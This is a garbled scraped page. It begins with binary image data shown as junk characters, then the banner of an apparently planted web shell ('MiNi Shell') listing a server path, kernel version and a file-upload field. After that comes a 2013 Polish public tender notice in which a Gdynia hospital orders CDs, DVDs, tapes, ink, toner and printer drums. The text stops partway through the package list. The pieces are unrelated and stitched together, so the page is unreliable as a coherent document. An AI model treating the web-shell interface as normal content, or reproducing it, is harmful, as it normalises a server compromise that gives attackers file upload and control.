JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131018/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131018/217991-N-2013.html

<p class="kh_header"><b>Gdynia: Sukcesywne dostawy fabrycznie nowych płyt CD i DVD, taśm magnetycznych, taśm do faksów, taśm do zgrzewarek, tuszy i tonerów na potrzeby Szpitala Św. Wincentego a Paulo Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 217991 - 2013; data zamieszczenia: 18.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Św. Wincentego a Paulo Spółka z o.o. , ul. Wójta Radtkego 1, 81-348 Gdynia, woj. pomorskie, tel. 58 6207501, faks 58 6201114.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalwincentego.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy fabrycznie nowych płyt CD i DVD, taśm magnetycznych, taśm do faksów, taśm do zgrzewarek, tuszy i tonerów na potrzeby Szpitala Św. Wincentego a Paulo Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego postępowania o udzielenie zamówienia publicznego są sukcesywne dostawy fabrycznie nowych płyt CD i DVD, taśm magnetycznych, taśm do faksów, taśm do zgrzewarek, tuszy i tonerów na potrzeby Szpitala Św. Wincentego a Paulo Sp. z o.o.
2. Szczegółowy opis przedmiotu zamówienia, ilości asortymentu zawiera załącznik nr 1b do SIWZ- wzór formularza ofertowego. 
3. Zamawiający informuje, iż ilości asortymentu stanowiącego przedmiot zamówienia są wartościami szacunkowymi, służącymi do prawidłowego skalkulowania ceny oferty, porównania ofert i wyboru oferty najkorzystniejszej. Ilość zamawianego asortymentu, w ramach realizacji umowy może ulec zmniejszeniu lub zwiększeniu, w poszczególnych grupach asortymentowych do 25 % (słownie: dwadzieścia pięć procent), w zależności od rzeczywistych potrzeb Zamawiającego, z zastrzeżeniem, iż wartość oferty wybranego Wykonawcy nie zostanie przekroczona..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.23.43.00-1, 30.23.44.00-2, 30.23.47.00-5, 30.12.51.00-2, 30.12.51.10-5, 30.12.43.00-7, 30.19.23.20-0, 30.13.23.40-6, 30.19.23.10-7, 30.13.23.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. W zakresie pakietów 2, 6 - 8 Zamawiający nie wymaga zabezpieczenia oferty wadium.
2. Wykonawca przystępujący do postępowania w zakresie pakietów 1, 3 - 5 zobowiązany jest do wniesienia wadium w następującej wysokości, ustalonej odrębnie dla każdego z pakietów:
Pakiet 1 - 1.600,00 zł;
Pakiet 3 - 150,00 zł;
Pakiet 4 - 1.650,00 zł;
Pakiet 5 - 190,00 zł.
3. Wadium powinno być wniesione najpóźniej do chwili składania ofert.
4. Wadium może zostać wniesione w pieniądzu; poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2010 r. Nr 240, poz. 1603 z późn. zm.).
5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: BNP Paribas Bank Polska S.A. PL 66 1600 1114 0004 0707 8076 0152 z podaniem tytułu wadium - przetarg znak: SW/ZP/251/N/66/2013 - DI - sukcesywne dostawy fabrycznie nowych płyt CD i DVD, taśm magnetycznych, taśm do faksów, taśm do zgrzewarek, tuszy i tonerów. Chwilą wniesienia wadium jest data uznania rachunku zamawiającego.
6. W przypadku wadium wnoszonego w formie niepieniężnej oryginał dokumentu należy złożyć w opisanej kopercie wraz z ofertą.
7. Dokument poręczenia/gwarancyjny powinien bezwzględnie przewidywać bezwarunkową, nieodwołalną i płatną na pierwsze żądanie utratę wadium na rzecz zamawiającego w przypadkach określonych w ust. 8.
8. Wykonawca traci wadium na rzecz Zamawiającego, wraz z odsetkami, w przypadku, gdy wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn nieleżących po jego stronie oraz w przypadku, gdy wykonawca, którego oferta została wybrana:
1) odmówi podpisania umowy na warunkach określonych w ofercie;
2) nie wniesie zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy będzie niemożliwe z przyczyn leżących po stronie wykonawcy.
9. Wadium musi zabezpieczać ofertę w całym okresie związania ofertą, który wynosi 30 dni licząc od upływu terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W odniesieniu do pakietu nr 1, poz. nr 2 i 3, Wykonawca załączy następujące dokumenty:
- certyfikat zapewnienia jakości zgodny z aneksem VI Dyrektywy 93/42/CCE (Dyrektywa dotycząca wyrobów medycznych)</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany i uzupełnienia umowy wymagają, pod rygorem nieważności formy pisemnej w postaci obustronnie podpisanego aneksu.
2. Istotne zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy mogą dotyczyć:
1) wynagrodzenia 
2) częstotliwości dostaw, miejsca dostaw,
3) zmiany cen asortymentu wskazanego w umowie,
4) zmiany nazwy produktu przy zachowaniu jego parametrów w sytuacji, gdy produkt zostanie wycofany z produkcji, lub wprowadzony do sprzedaży przez producenta produkt zmodyfikowany/udoskonalony, przy czym zmiana ta nie może powodować wzrostu ceny zawartej w ofercie,
5) wydłużenia terminu obowiązywania umowy, w sytuacji nie zrealizowania całego asortymentu będącego przedmiotem umowy w pierwotnym terminie. 
3. Zmiany, o których mowa w ust. 2 mogą być dokonane w następujących przypadkach:
1) ustawowej zmiany stawki podatku od towarów i usług (VAT),  przy czym zmianie ulegną wyłącznie ceny jednostkowe brutto, natomiast ceny jednostkowe  netto pozostaną bez zmian,
2) w zakresie, o którym mowa w ust. 2 pkt. 3, w przypadku:
a) zmian wprowadzonych przez producentów, obniżki marży,
b) zmian kursu waluty w przypadku towarów importowanych, zgodnie z tabelą NBP;
3) w przypadku zmiany przepisów prawa mających wpływ na warunki umowy
4) jeżeli zmiany nie spowodują negatywnych konsekwencji dla Zamawiającego.
4. Strona wnioskująca o zmianę umowy, przedkłada drugiej stronie pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalwincentego.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Św. Wincentego a Paulo Sp. z o.o. w Gdyni, ul. Wójta Radtkego 1, 81 - 348 Gdynia, Dział Zamówień Publicznych bud. gospodarczy pok. nr 11..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2013 godzina 10:00, miejsce: Szpital Św. Wincentego a Paulo Sp. z o.o. w Gdyni, ul. Wójta Radtkego 1, 81 - 348 Gdynia, Dział Zamówień Publicznych bud. gospodarczy pok. nr 11..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PŁYTY CD I DVD
1. Nośnik danych CD - 4800 szt.
2. Nośnik danych CD, printable - 40000 szt.
3. Nośnik danychDVD, printable - 1200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.43.00-1, 30.23.44.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TAŚMY MAGNETYCZNE
1. Fabrycznie nowa taśma magnetyczna DAT-72	 - 10 szt
2. Fabrycznie nowa taśma magnetyczna DAT-72 4mm Cleaning Tape - 5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.47.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TUSZE DO DRUKAREK
1. Fabrycznie nowy tusz do urządzenia Canon PIXIMA mp150 (czarny) lub równoważny - 12 szt.
2. Fabrycznie nowy tusz do urządzenia Canon PIXIMA mp150 (kolor) lub równoważny - 12 szt.
3. Fabrycznie nowy tusz do urządzenia HP Deskjet 1120C (kolor - tusz HP 23) lub równoważny - 2 szt.
4. Fabrycznie nowy tusz do urządzenia HP Deskjet 2050A (czarny) lub równoważny - 16 szt.
5. Fabrycznie nowy tusz do urządzenia HP Deskjet 2050A (kolor) lub równoważny - 10 szt.
6. Fabrycznie nowy tusz do urządzenia HP Deskjet Ink Advantage 2515 (czarny) lub równoważny - 14 szt.
7. Fabrycznie nowy tusz do urządzenia HP Deskjet Ink Advantage 2515 (kolor) lub równoważny - 14 szt.
8. Fabrycznie nowy tusz do urządzenia HP Deskjet 710c (czarny) lub równoważny - 15 szt.
9. Fabrycznie nowy tusz do urządzenia HP PSC 1315 (czarny) lub równoważny -	12 szt.
10. Fabrycznie nowy tusz do urządzenia HP PSC 1315 (kolor) lub równoważny - 3 szt.
11. Fabrycznie nowy tusz do urządzenia HP PSC 1410 (czarny) lub równoważny - 12 szt.
12. Fabrycznie nowy tusz do urządzenia HP PSC 1410 (kolor) lub równoważny - 6 szt.
13. Fabrycznie nowy tusz do urządzenia HP PSC 1510 (czarny) lub równoważny - 24 szt.
14. Fabrycznie nowy tusz do urządzenia Lexmark X5650 (czarny) lub równoważny - 6 szt.
15. Fabrycznie nowy tusz do urządzenia Lexmark X5650 (kolor) lub równoważny - 6 szt.
16. Fabrycznie nowy tusz do urządzenia Lexmark X9575 (czarny) lub równoważny - 3 szt.
17. Fabrycznie nowy tusz do urządzenia Lexmark X9575 (kolor) lub równoważny - 3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TONERY DO DRUKAREK, FOTOKOPIAREK I FAKSÓW
1. Fabrycznie nowy toner do urządzenia Brother 2920 (toner) - fax lub równoważny - 7 szt.
2. Fabrycznie nowy toner do urządzenia Brother MFC 7320 lub równoważny - 26 szt.
3. Fabrycznie nowy toner do urządzenia Canon ir 1022A lub równoważny - 4 szt.
4. Fabrycznie nowy toner do urządzenia Canon LBP 3010 lub równoważny - 12 szt.
5. Fabrycznie nowy toner do urządzenia Canon NP-1020 lub równoważny - 8 szt.
6. Fabrycznie nowy toner do urządzenia Canon PC 860 lub równoważny - 5 szt.
7. Fabrycznie nowy toner do urządzenia Gestetner 3222 lub równoważny - 15 szt.
8. Fabrycznie nowy toner do urządzenia HP Laserjet 1010/1015/1018/1022n/3052 lub równoważny - 114 szt.
9. Fabrycznie nowy toner do urządzenia HP Laserjet 1100 lub równoważny - 12 szt.
10. Fabrycznie nowy toner do urządzenia HP Laserjet 1320 lub równoważny - 4 szt.
11. Fabrycznie nowy toner do urządzenia HP Laserjet 2550n (cyan) lub równoważny - 8 szt.
12. Fabrycznie nowy toner do urządzenia HP Laserjet 2550n (czarny) lub równoważny - 8 szt.
13. Fabrycznie nowy toner do urządzenia HP Laserjet 2550n (magenta) lub równoważny - 8 szt.
14. Fabrycznie nowy toner do urządzenia HP Laserjet 2550n (żółty) lub równoważny - 8 szt.
15. Fabrycznie nowy toner do urządzenia HP Laserjet 4250n lub równoważny - 2 szt.
16. Fabrycznie nowy toner do urządzenia HP Laserjet CP1215/CP1515 (cyan) lub równoważny - 16 szt.
17. Fabrycznie nowy toner do urządzenia HP Laserjet CP1215/CP1515 (czarny) lub równoważny - 18 szt.
18. Fabrycznie nowy toner do urządzenia HP Laserjet CP1215/CP1515 (magenta) lub równoważny - 16 szt.
19. Fabrycznie nowy toner do urządzenia HP Laserjet CP1215/CP1515 (żółty) lub równoważny - 16 szt.
20. Fabrycznie nowy toner do urządzenia HP Laserjet M1212 lub równoważny - 12 szt.
21. Fabrycznie nowy toner do urządzenia HP Laserjet M1522n/M1120 lub równoważny - 52 szt.
22. Fabrycznie nowy toner do urządzenia HP Laserjet P1005 lub równoważny - 123 szt.
23. Fabrycznie nowy toner do urządzenia HP Laserjet P1102w lub równoważny - 71 szt.
24. Fabrycznie nowy toner do urządzenia HP Laserjet P1566 lub równoważny - 22 szt.
25. Fabrycznie nowy toner do urządzenia HP Laserjet P2015dn lub równoważny - 21 szt.
26. Fabrycznie nowy toner do urządzenia HP Laserjet P2055 lub równoważny - 67 szt.
27. Fabrycznie nowy toner do urządzenia Konica Minolta Bizhub 130f lub równoważny - 6 szt.
28. Fabrycznie nowy toner do urządzenia Konica-Minolta Bizhub 162 lub równoważny - 10 szt.
29. Fabrycznie nowy toner do urządzenia Konica Minolta Bizhub 361 lub równoważny - 6 szt.
30. Fabrycznie nowy toner do urządzenia Konica Minolta Bizhub C253 (cyan) lub równoważny - 3 szt.
31. Fabrycznie nowy toner do urządzenia Konica Minolta Bizhub C253 (czarny) lub równoważny - 3 szt.
32. Fabrycznie nowy toner do urządzenia Konica Minolta Bizhub C253 (magenta) lub równoważny - 3 szt.
33. Fabrycznie nowy toner do urządzenia Konica Minolta Bizhub C253 (żółty) lub równoważny - 3 szt.
34. Fabrycznie nowy toner do urządzenia Konica-Minolta Magicolor 2550 (cyan) lub równoważny - 14 szt.
35. Fabrycznie nowy toner do urządzenia Konica-Minolta Magicolor 2550 (czarny) lub równoważny - 21 szt.
36. Fabrycznie nowy toner do urządzenia Konica-Minolta Magicolor 2550 (magenta) lub równoważny - 14 szt.
37. Fabrycznie nowy toner do urządzenia Konica-Minolta Magicolor 2550 (żółty) lub równoważny - 14 szt.
38. Fabrycznie nowy toner do urządzenia Kyocera FS-1041 lub równoważny - 36 szt.
39. Fabrycznie nowy toner do urządzenia Lanier 5227 lub równoważny - 12 szt.
40. Fabrycznie nowy toner do urządzenia OKI MB451dn lub równoważny - 16 szt.
41. Fabrycznie nowy toner do urządzenia Ricoh Aficio 1022 lub równoważny - 28 szt.
42. Fabrycznie nowy toner do urządzenia Samsung CLP-320 (cyan) lub równoważny	- 3 szt.
43. Fabrycznie nowy toner do urządzenia Samsung CLP-320 (czarny) lub równoważny - 3 szt.
44. Fabrycznie nowy toner do urządzenia Samsung CLP-320 (magenta) lub równoważny - 3 szt.
45. Fabrycznie nowy toner do urządzenia Samsung CLP-320 (żółty) lub równoważny	- 3 szt.
46. Fabrycznie nowy toner do urządzenia Samsung ML-1520 lub równoważny - 2 szt.
47. Fabrycznie nowy toner do urządzenia Samsung ML-1640 lub równoważny - 20 szt.
48. Fabrycznie nowy toner do urządzenia Samsung ML-1710 lub równoważny - 4 szt.
49. Fabrycznie nowy toner do urządzenia Samsung ML-2010 / ML-1610 / SCX - 4521f lub równoważny - 18 szt.
50. Fabrycznie nowy toner do urządzenia Samsung ML-2850D lub równoważny - 3 szt.
51. Fabrycznie nowy toner do urządzenia Samsung SCX-4200 lub równoważny - 6 szt.
52. Fabrycznie nowy toner do urządzenia Sharp AR-5420 lub równoważny - 5 szt.
53. Fabrycznie nowy toner do urządzenia Xerox Workcentre 3220 lub równoważny - 34 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BĘBNY ŚWIATŁOCZUŁE DO DRUKAREK I FAKSÓW
1. Fabrycznie nowy bęben do urządzenia Brother 2920 (bęben) - fax lub równoważny - 1 szt.
2. Fabrycznie nowy bęben do urządzenia Brother MFC 7320 lub równoważny - 1 szt.
3. Fabrycznie nowy bęben do urządzenia Canon ir 1022A lub równoważny - 1 szt.
4. Fabrycznie nowy bęben do urządzenia HP Laserjet 2550n (bęben) lub równoważny - 3 szt.
5. Fabrycznie nowy bęben do urządzenia Konica Minolta Bizhub 162 lub równoważny - 1 szt.
6. Fabrycznie nowy bęben do urządzenia Konica Minolta Bizhub C253 (cyan) lub równoważny - 1 szt.
7. Fabrycznie nowy bęben do urządzenia Konica Minolta Bizhub C253 (czarny) lub równoważny - 1 szt.
8. Fabrycznie nowy bęben do urządzenia Konica Minolta Bizhub C253 (magenta) lub równoważny - 1 szt.
9. Fabrycznie nowy bęben do urządzenia Konica Minolta Bizhub C253 (żółty) lub równoważny - 1 szt.
10. Fabrycznie nowy bęben do urządzenia Konica-Minolta Magicolor 2550 (bęben) lub równoważny - 7 szt.
11. Fabrycznie nowy bęben do urządzenia OKI MB451dn lub równoważny - 2 szt.
12. Fabrycznie nowy bęben do urządzenia Samsung CLP-320 (bęben) lub równoważny - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.43.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TAŚMY I FOLIE DO DRUKAREK I FAKSÓW
1. Fabrycznie nowa folia do urządzenia Panasonic KX-FC 268 lub równoważny - 25 szt.
